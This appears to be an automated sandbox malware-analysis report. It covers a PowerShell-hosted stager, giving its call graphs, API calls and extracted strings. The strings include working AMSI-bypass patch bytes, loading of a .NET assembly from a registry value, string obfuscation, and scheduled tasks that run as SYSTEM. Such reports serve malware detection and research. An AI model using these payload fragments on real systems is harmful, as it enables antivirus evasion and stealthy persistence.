CryptAcquireContextW 332->355 335 401a37 StrStrIW 337 401a9d 335->337 336 4018d8 345 401986 lstrlenW 336->345 338 401b71 6 API calls 337->338 339 401a57 StrStrIW StrNCatW StrCatW 337->339 341 401b27 StrCatW 337->341 342 401afb StrCatW StrNCatW 337->342 344 401adf StrCatW StrCatW 337->344 338->336 339->337 340 401b41 StrCatW StrStrIW 339->340 340->337 341->337 341->340 343 401b18 StrCatW 342->343 343->341 344->343 358 40104b 345->358 348 4019b3 StrStrIW 349 4018e4 348->349 350 4019bf 348->350 349->271 351 4019c0 StrStrIW 350->351 351->349 351->351 353 4011aa 352->353 354 40119d GetProcAddress 352->354 353->331 354->331 356 401044 355->356 357 401028 CryptGenRandom CryptReleaseContext 355->357 356->335 356->336 357->356 359 401000 3 API calls 358->359 360 401076 359->360 360->348 360->349

                              Callgraph

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 61 4011ad-401203 SysAllocString * 6 CoInitializeEx 62 4014f0 61->62 63 401209-40121d CoInitializeSecurity 61->63 64 4014f3-401519 SysFreeString * 6 62->64 65 40122a-401246 CoCreateInstance 63->65 66 40121f-401224 63->66 67 4014e5 65->67 68 40124c-401291 VariantInit 65->68 66->65 66->67 69 4014e8-4014ee CoUninitialize 67->69 71 4014d4 68->71 72 401297-4012ac 68->72 69->64 73 4014d7-4014e3 71->73 72->71 76 4012b2-4012c5 72->76 73->69 78 4014c6 76->78 79 4012cb-4012dd 76->79 80 4014c9-4014d2 78->80 82 4012e3-4012f0 79->82 83 4014b8 79->83 80->73 87 4012f6-401302 82->87 88 4014aa 82->88 85 4014bb-4014c4 83->85 85->80 87->88 93 401308-40131a 87->93 90 4014ad-4014b6 88->90 90->85 93->88 95 401320-401336 93->95 97 40149c 95->97 98 40133c-401352 95->98 99 40149f-4014a8 97->99 102 401358-40136a 98->102 103 40148e 98->103 99->90 106 401480 102->106 107 401370-401383 102->107 104 401491-40149a 103->104 104->99 109 401483-40148c 106->109 111 401472 107->111 112 401389-40139f 107->112 109->104 114 401475-40147e 111->114 117 401464 112->117 118 4013a5-4013b3 112->118 114->109 119 401467-401470 117->119 122 401456 118->122 123 4013b9-4013c7 118->123 119->114 124 401459-401462 122->124 123->122 126 4013cd-4013db 123->126 124->119 126->122 129 4013dd-401440 VariantInit * 3 126->129 130 401444-401446 129->130 130->124 131 401448-401454 130->131 131->124
                              APIs
                              • SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
                              • SysAllocString.OLEAUT32(00402234), ref: 004011CC
                              • SysAllocString.OLEAUT32(powershell), ref: 004011D8
                              • SysAllocString.OLEAUT32(?), ref: 004011E0
                              • SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                              • SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                              • CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                              • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                              • VariantInit.OLEAUT32(?), ref: 00401250
                              • VariantInit.OLEAUT32(?), ref: 004013EA
                              • VariantInit.OLEAUT32(?), ref: 004013F0
                              • VariantInit.OLEAUT32(?), ref: 00401400
                              • CoUninitialize.COMBASE ref: 004014E8
                              • SysFreeString.OLEAUT32(?), ref: 004014FA
                              • SysFreeString.OLEAUT32(00000000), ref: 004014FD
                              • SysFreeString.OLEAUT32(?), ref: 00401502
                              • SysFreeString.OLEAUT32(?), ref: 00401507
                              • SysFreeString.OLEAUT32(?), ref: 0040150C
                              • SysFreeString.OLEAUT32(?), ref: 00401511
                              Strings
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: String$AllocFree$InitVariant$Initialize$CreateInstanceSecurityUninitialize
                              • String ID: $rbx-svc32$$rbx-svc64$SYSTEM$powershell
                              • API String ID: 3960698109-3701805373
                              • Opcode ID: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                              • Instruction ID: 37100555a8a6d5ebab17ddb862eb0107d88f8e52c3f2eb0dc8ef098a6b7a2dd9
                              • Opcode Fuzzy Hash: ff7d6058a75d3fd49d40f97f6d914bf38f4691f494542389520dc0ad8fdbed81
                              • Instruction Fuzzy Hash: D5C1FC71E00119EFDB00DFA5C988DAEBBB9FF49354B1040A9E905FB2A0DB75AD06CB51

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 152 4017a5-4017bf FindResourceA 153 401862-401867 152->153 154 4017c5-4017d2 SizeofResource 152->154 155 401861 154->155 156 4017d8-4017e2 LoadResource 154->156 155->153 156->155 157 4017e4-401809 LockResource RegOpenKeyExW 156->157 157->155 158 40180b-401820 RegSetValueExW 157->158 158->155 159 401822-401858 call 401868 call 401674 * 2 call 40112f call 4011ad 158->159 159->155 170 40185a-40185c call 40151a 159->170 170->155
                              APIs
                              • FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                              • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                              • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                              • LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                              • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                              • RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                                • Part of subcall function 00401868: GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                                • Part of subcall function 00401868: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                                • Part of subcall function 00401868: StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                                • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                                • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                                • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                                • Part of subcall function 00401868: StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                                • Part of subcall function 00401674: SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
                                • Part of subcall function 00401674: SysAllocString.OLEAUT32(0040218C), ref: 00401690
                                • Part of subcall function 00401674: CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                                • Part of subcall function 00401674: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                                • Part of subcall function 00401674: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                                • Part of subcall function 00401674: VariantInit.OLEAUT32(?), ref: 004016EE
                                • Part of subcall function 00401674: CoUninitialize.COMBASE ref: 0040177A
                                • Part of subcall function 00401674: SysFreeString.OLEAUT32(?), ref: 0040178C
                                • Part of subcall function 00401674: SysFreeString.OLEAUT32(00000000), ref: 0040178F
                                • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                                • Part of subcall function 004011AD: SysAllocString.OLEAUT32($rbx-svc64), ref: 004011C2
                                • Part of subcall function 004011AD: SysAllocString.OLEAUT32(00402234), ref: 004011CC
                                • Part of subcall function 004011AD: SysAllocString.OLEAUT32(powershell), ref: 004011D8
                                • Part of subcall function 004011AD: SysAllocString.OLEAUT32(?), ref: 004011E0
                                • Part of subcall function 004011AD: SysAllocString.OLEAUT32(0040218C), ref: 004011EA
                                • Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
                                • Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
                                • Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
                                • Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
                                • Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250
                                • Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                                • Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
                                • Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                                • Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                                • Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                                • Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594
                              Strings
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
                              • String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$EXE$SOFTWARE
                              • API String ID: 2402434814-2001424239
                              • Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                              • Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
                              • Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
                              • Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 190 401000-401026 CryptAcquireContextW 191 401044-40104a 190->191 192 401028-401041 CryptGenRandom CryptReleaseContext 190->192 192->191
                              APIs
                              • CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                              • CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                              • CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                              Strings
                              • Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: Crypt$Context$AcquireRandomRelease
                              • String ID: Microsoft Base Cryptographic Provider v1.0
                              • API String ID: 1815803762-291530887
                              • Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                              • Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
                              • Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
                              • Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

                              Control-flow Graph

                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
                              • StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
                              • StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3
                                • Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
                                • Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144
                              • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
                              • StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
                              • StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
                              • StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF
                              Strings
                              • LoadLibraryPtr, xrefs: 00401944
                              • function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
                              • LoadLibraryDelegate, xrefs: 00401920
                              • ParameterTypes, xrefs: 004018E4
                              • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
                              • AmsiPtr, xrefs: 0040195C
                              • TypeBuilder, xrefs: 004018FC
                              • AmsiScanBufferPtr, xrefs: 00401968
                              • [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
                              • NativeMethods, xrefs: 00401908
                              • VirtualProtectPtr, xrefs: 00401950
                              • ReturnType, xrefs: 004018F0
                              • GetProcAddress, xrefs: 00401914
                              • VirtualProtectDelegate, xrefs: 0040192C
                              • [Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
                              • [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
                              • Get-Delegate, xrefs: 004018D8
                              • Kernel32Ptr, xrefs: 00401938
                              • OldProtect, xrefs: 00401974
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: Process$Heap$AllocCurrentWow64
                              • String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
                              • API String ID: 2666690646-646820343
                              • Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                              • Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
                              • Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
                              • Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

                              Control-flow Graph

                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00008000,75B12EB0,00000000,00402238), ref: 004019F4
                              • HeapAlloc.KERNEL32(00000000), ref: 00401A01
                              • GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
                              • HeapAlloc.KERNEL32(00000000), ref: 00401A1C
                                • Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
                                • Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
                                • Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039
                              • StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
                              • StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
                              • StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
                              • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
                              • StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
                              • StrCatW.SHLWAPI(?,?), ref: 00401AF2
                              • StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
                              • StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
                              • StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
                              • StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
                              • StrCatW.SHLWAPI(00000000,?), ref: 00401B75
                              • StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
                              • HeapFree.KERNEL32(00000000), ref: 00401B93
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
                              • HeapFree.KERNEL32(00000000), ref: 00401B9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
                              • String ID: '+'$'+[Char]($)+'
                              • API String ID: 3510167801-3465596256
                              • Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                              • Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
                              • Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
                              • Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 133 40151a-401547 SysAllocString * 2 CoInitializeEx 134 40154d-401561 CoInitializeSecurity 133->134 135 40165f-401673 SysFreeString * 2 133->135 136 401563-401568 134->136 137 40156e-40158a CoCreateInstance 134->137 136->137 138 401659 CoUninitialize 136->138 137->138 139 401590-4015d5 VariantInit 137->139 138->135 141 4015d7-4015ec 139->141 142 40164d-401656 139->142 141->142 145 4015ee-401603 141->145 142->138 147 401644-401648 145->147 148 401605-401627 VariantInit 145->148 147->142 149 40162b-40162d 148->149 150 40163b-40163f 149->150 151 40162f-401636 149->151 150->147 151->150
                              APIs
                              • SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
                              • SysAllocString.OLEAUT32(0040218C), ref: 00401538
                              • CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
                              • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
                              • VariantInit.OLEAUT32(?), ref: 00401594
                              • VariantInit.OLEAUT32(?), ref: 00401609
                              • CoUninitialize.COMBASE ref: 00401659
                              • SysFreeString.OLEAUT32(00000000), ref: 00401666
                              • SysFreeString.OLEAUT32(?), ref: 0040166B
                              Strings
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
                              • String ID: $rbx-svc32$$rbx-svc64
                              • API String ID: 2407135876-384997928
                              • Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                              • Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
                              • Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
                              • Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 172 401674-4016a1 SysAllocString * 2 CoInitializeEx 173 401782 172->173 174 4016a7-4016bb CoInitializeSecurity 172->174 177 401785-401797 SysFreeString * 2 173->177 175 4016c8-4016e4 CoCreateInstance 174->175 176 4016bd-4016c2 174->176 178 401777 175->178 179 4016ea-401732 VariantInit 175->179 176->175 176->178 180 40177a-401780 CoUninitialize 178->180 182 401734-40174a 179->182 183 401769 179->183 180->177 184 40176c-401775 182->184 186 40174c-401752 182->186 183->184 184->180 188 401757-401767 186->188 188->184
                              APIs
                              • SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
                              • SysAllocString.OLEAUT32(0040218C), ref: 00401690
                              • CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
                              • CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
                              • VariantInit.OLEAUT32(?), ref: 004016EE
                              • CoUninitialize.COMBASE ref: 0040177A
                              • SysFreeString.OLEAUT32(?), ref: 0040178C
                              • SysFreeString.OLEAUT32(00000000), ref: 0040178F
                              Strings
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                              • String ID: $rbx-svc32
                              • API String ID: 4184240511-186198907
                              • Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                              • Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
                              • Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
                              • Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 193 401986-4019b1 lstrlenW call 40104b 196 4019b3-4019bd StrStrIW 193->196 197 4019dd-4019e0 193->197 196->197 198 4019bf 196->198 199 4019c0-4019da StrStrIW 198->199 199->199 200 4019dc 199->200 200->197
                              APIs
                              • lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
                              • StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
                              • StrStrIW.SHLWAPI(?,Get-Delegate,75B12EB0), ref: 004019D2
                              Strings
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: lstrlen
                              • String ID: Get-Delegate
                              • API String ID: 1659193697-1365458365
                              • Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                              • Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
                              • Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
                              • Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 209 401798-40179e call 4017a5 ExitProcess
                              APIs
                                • Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
                                • Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
                                • Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
                                • Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
                                • Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
                                • Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818
                              • ExitProcess.KERNEL32 ref: 0040179E
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
                              • String ID:
                              • API String ID: 3836967525-0
                              • Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                              • Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
                              • Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
                              • Instruction Fuzzy Hash:

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 212 40118e-40119b GetModuleHandleA 213 4011aa-4011ac 212->213 214 40119d-4011a9 GetProcAddress 212->214
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3
                              Strings
                              Memory Dump Source
                              • Source File: 00000023.00000002.2430827197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_35_2_400000_powershell.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: RtlGetVersion$ntdll.dll
                              • API String ID: 1646373207-1489217083
                              • Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                              • Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
                              • Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
                              • Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

                              Execution Graph

                              Execution Coverage:3.6%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:42.9%
                              Total number of Nodes:28
                              Total number of Limit Nodes:0
